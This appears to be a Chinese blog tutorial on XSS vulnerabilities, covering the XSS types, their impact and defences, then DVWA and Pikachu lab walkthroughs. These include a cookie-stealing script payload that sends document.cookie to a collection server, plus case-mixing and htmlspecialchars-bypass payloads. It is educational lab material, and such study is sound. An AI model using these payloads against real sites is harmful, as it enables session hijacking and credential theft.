xss 漏洞分析

最新推荐文章于 2024-05-07 09:47:33 发布
最新推荐文章于 2024-05-07 09:47:33 发布
阅读量83 收藏 2
点赞数 1
文章标签: xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rnn0921/article/details/132317792
版权

1 ,漏洞简介

  1. XSS 的原理 跨站脚本攻击 XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页面时,嵌入 Web 里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。XSS 攻击针对的是用户层面的攻击!

  2. 分类 XSS 分为:存储型 、反射型 、DOM 型 XSS 存储型 XSS:存储型 XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种 XSS 比较危险,容易造成蠕虫,盗窃 cookie 反射型 XSS:非持久化,需要欺骗用户自己去点击链接才能触发 XSS 代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。反射型 XSS 大多数是用来盗取用户的 Cookie 信息。 DOM 型 XSS:不经过后端,DOM-XSS 漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,DOM-XSS 是通过 url 传入参数去控制触发的,其实也属于反射型 XSS

2 ,漏洞影响范围

  1. Web 应用程序:XSS 漏洞主要影响 Web 应用程序,特别是那些允许用户输入和显示内容的网页应用程序。如果开发人员没有正确过滤或转义用户输入的数据,攻击者可以插入恶意脚本代码,并在受害者浏览器中执行。

  2. 受害者浏览器:XSS 漏洞通过操纵 Web 应用程序输出到受害者浏览器的 HTML 或 JavaScript 代码来实施攻击。一旦受害者浏览器加载了带有恶意脚本的页面,攻就可以执行作,如窃取用户信息、篡改页面内容或进行其他恶意活动。

  3. 用户:任何与受影响的 Web 应用程序交互

3 ,漏洞详解

xss 攻击通过注入恶意脚本到受害者的浏览器中执行,从而实施攻击

  1. 漏洞原理:XSS 漏洞发生在 Web 应用程序未正确对用户输入进行验证、过滤或转义,导致恶意脚本可以被插入到动态生成的 HTML 页面中,当其他用户访问该页面时,恶意脚本会在其浏览器中执行。

  2. 攻击类型:

    • 反射型 XSS:攻击者将恶意脚本作为参数或数据提交给 Web 应用程序,然后服务器将这些恶意内容回显到响应页面,如果用户点击包含恶意脚本的链接,则恶意脚本会在其浏览器中执行。

    • 存储型 XSS:攻击者将恶意脚本存储在 Web 应用程序的数据库或其他持久性存储中,然后其他用户在浏览相关内容时,服务器会将存储的恶意脚本返回给他们的浏览器,从而执行攻击。

  3. 攻击影响:

    • 数据窃取:攻击者通过 XSS 可以窃取受害者的敏感信息,如登录凭据、Cookie 数据或其他个人隐私信息。 会话劫持:攻击者可以利用 XSS 漏洞获取受害者的会话信息,以伪装成受害者,并执行某些操作。

    • 网站篡改:攻击者可以通过注入恶意代码来更改网站内容、插入广或钓鱼页面。

  4. 防御措施:

    • 输入验证和过滤:对用户输入数据进行有效验证和过滤,确保不包含恶意脚本。

    • 输出转义:在将用户数据插入到 HTML 或 JavaScript 代码之前,使用适当的编码/转义,可以防止被解析为可执行代码。

    • 安全编码实践:采用安全的开发实践,如使用 Web 框架或库提供的安全方法。

    • 内容安全策略(CSP):实施 CSP 可以帮助限制浏览器中可执行的内容来源,用于防止 XSS 攻击。

实例

dvwa

反射性 xss:

获取 cookie 值

 

 存储型(持久型),每次进入页面或者刷新都会被执行

 

内容被存储

 DOM 型 XSS

将English修改为ch

 

 

pikachu

cookie 获取

 

反射 get 型 xss

  • 首先在 pikachu 的 xss(get)请求中构造 payload <script>document.location='http://pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

 输入框长度受限,修改到 200000,然后输入 payload,提交

 

提交成功后进入 pkxss 后台查看获取的 cookie

 反射 post 型 xss

使用反射型 xss(post),可以看到数据是以 post 的形式传递在请求体中

 构造 form 表单

 构造 url,让登录用户点击 url,提交表单,获取 cookie,从而拿到用户的登录名和密码

 存储型 xss

提交以后有弹框,下次打开自动弹框

 

 xss 绕过

script标签大小写绕过

<ScRipt>alert(666)</ScRipt>

 

 htmlspecialcharts

后端使用 htmlspecialcharts 对输入的特殊字符进行过滤但是对'不过滤

构造 payload

x' οnclick='alert(9999)'

 

宁可123
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS跨站脚本】存储XSS持久
08-23 1675
XSS跨站脚本】存储XSS
XSS漏洞分析
qq_42741290的博客
05-18 485
一、安装配置DVWA环境 1、安装PHP集成环境——phpstudy 并启动apache和mysql。 2、安装DVWA 把下载好的dvwa安装包解压放到C:\phpstudy_pro\WWW文件夹下 打开config文件夹,打开config.inc.php,修改’db_password’为root。 3、登录DVWA 在浏览器输入http://192.168.74.145/DVWA-master/login.php(建议使用火狐浏览器) Username:admin,Password:passwo
Metinfo 6.1.3 XSS漏洞分析
BerL1n
12-29 564
time: 2019-04-11 21:11 文章首发于安全客,Metinfo 6.1.3 XSS漏洞分析 前言 前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞是metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。 这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。 cms最新6.13下载地址:https://www.mituo.cn/download/ 前台漏洞分析( CVE-2018-20486) 通过在前台插入xss..
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能触发XSS攻击。 二、XSS漏洞的危
JAVA代码审计-XSS漏洞分析
shelter1234567的博客
10-23 829
XSS漏洞,可不仅仅是弹窗这么简单,本篇先讲一讲触发该漏洞的形式,换一期讲一讲XSS的危害究竟有多大!
xss漏洞分析
qq_43814486的博客
05-08 506
xss名字来源: xss又叫跨站脚本攻击,英文(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)混淆,所以将跨站脚本攻击命名为XSS。 其实xss叫”跨站脚本攻击“ 这个名字很随意,仅仅是因为最开始时黑客们演示xss漏洞的时候用的是“跨站”的植入脚本这种方式,所以才叫这个名,现在浏览器都默认执行“同源策略”,xss漏洞很难再去...
XSS漏洞分析
m0_69435261的博客
09-01 301
XSS(跨站脚本)漏洞是一种常见的网络安全漏洞,它允许攻击者在受害者的网页上注入恶意脚本代码。当受害者访问被注入的网页时,恶意脚本在受害者的浏览器中执行,从而导致攻击者能够窃取用户的敏感信息、劫持用户话、修改网页内容等恶意行为。XSS漏洞通常发生在Web应用程序中,其中用户的输入没有经过充分的过滤或转义处理,而是直接插入到网页的HTML代码中。攻击者可以利用这个漏洞,通过在用户输入中注入恶意脚本来执行各种攻击。
XSS漏洞分析和防御
1ance's blog
05-03 967
XSS:跨站脚本攻击(Cross Site Script) 形成原因是:未对用户输入的数据做好过滤,导致HTML页面被注入恶意脚本,从而在用户浏览网页时,被攻击者控制用户浏览器(反射一些用户信息如cookie等给攻击者)。 通常利用方法:XSS漏洞一般是通过php的输出函数将javascript的代码(恶意代码)输出到HTML页面,所以XSS漏洞关键是寻找参数未做过滤的输出函数。 php的常用输出: echo print() print_r() printf() sprintf() var_dump()
XSS漏洞原理和利用
VictorZhang
08-09 1万+
XSS漏洞原理和利用 1.XSS介绍及原理 XSS又叫CSS(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往Web页面 里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码执行,从而 达到恶意的特殊目的。 利用我们所知道的各种黑魔法,向Web页面插入JS代码,让JS代码可以被浏览器执行, 访问该页面的用户则被攻击。 XSS漏洞分类 1.反射 非存储...
论文研究-一种基于DOM随机性的XSS漏洞动态检测方法 .pdf
08-15
一种基于DOM随机性的XSS漏洞动态检测方法,高灵杰,辛阳,XSS漏洞是Web应用程序威胁最大的安全漏洞之一。传统的XSS漏洞扫描工具并没有对现代Web应用程序常用的异步数据传输以及动态内容进行针
前端顽疾--XSS漏洞分析与解决.ppt
05-07
前端顽疾--XSS漏洞分析与解决.ppt
xss漏洞扫描工具
03-12
它可以分析使用HTTP和HTTPS协议进行通信的应用程序,可以用最简单地形式记录它观察的话,并允许操作人员以各种方 ...不管是帮助开发人员调试其它方面 的难题,还是允许安全专业人员识别漏洞,它都是一款不错的工具。
OurPHP员中心 xss漏洞1
08-03
漏洞简介:OurPHP员中心>收货地址 存在xss漏洞,可获取管理员cookie。漏洞分析:在client/user/ourphp_play.class.ph
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
01-xss基本原理
tianxiadiiw的博客
05-06 535
/ 将数据保存起来,文件或数据库 // 让他直接跳转到真实的网站 echo "<script>location.href='https://www.taobao.com';xss全程为:Cross site scripting,指跨站攻击脚本,XSS漏洞发生在前端,攻击的是浏览器的解析引擎,xss也算是注入类的漏洞,JavaScript的代码注入,所以xss漏洞更主要是去攻击系统用户,而不是系统本身。XSS是以Web站点用户为攻击目标,而不是服务器,所以是一种钓鱼攻击,攻击目标是不确定的。
一个5000刀的XSS
2401_84434570的博客
05-03 422
背景介绍今天分享国外一个白帽小哥Crypto通过发现Apple某网站XSS而获得5000美元赏金的故事。废话不多说,让我们开始吧~
概念解析 | 威胁建模与DREAD评估:构建安全的系统防线
NLOS的博客
05-05 352
在信息安全领域,威胁建模就像是一位睿智的军师,他审时度势,为系统安全布局。这位军师仔细分析系统的架构,找出其中潜在的薄弱环节,预判可能出现的安全威胁。他问自己这样的问题:“如果我是敌人,我从哪里发起进攻?我的目标是什么?我利用系统的哪些漏洞?通过这样的分析,威胁建模可以帮助我们更全面、更系统地评估系统面临的安全风险,找出最需要防范的威胁,并有针对性地制定防御策略。这就像是在城墙上加固门禁,在易受攻击的地方布置更多的守卫。
Gartner发布应对动荡、复杂和模糊世界的威胁形势指南:当前需要应对的12种不稳定性、不确定性、复杂和模糊的安全威胁
最新发布
lurenjia404的博客
05-07 923
当今世界是动荡(Volatile)、复杂(Complex)和模糊(Ambiguous)的,随着组织追求数字化转以及犯罪分子不断发展技术,由此产生的安全威胁也是波动性、不确定性、复杂性和模糊性的,安全和风险管理领导者必须完善策略以应对 VUCA 世界中的威胁。
pikachu靶场xss漏洞通关
08-10
要通关Pikachu靶场的XSS漏洞,你可以按照以下步骤进行操作: 1. 首先,了解XSS漏洞的原理和类XSS(跨站脚本攻击)是一种常见的Web漏洞,攻击者通过在网页中注入恶意脚本,利用用户的浏览器执行恶意代码,从而...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值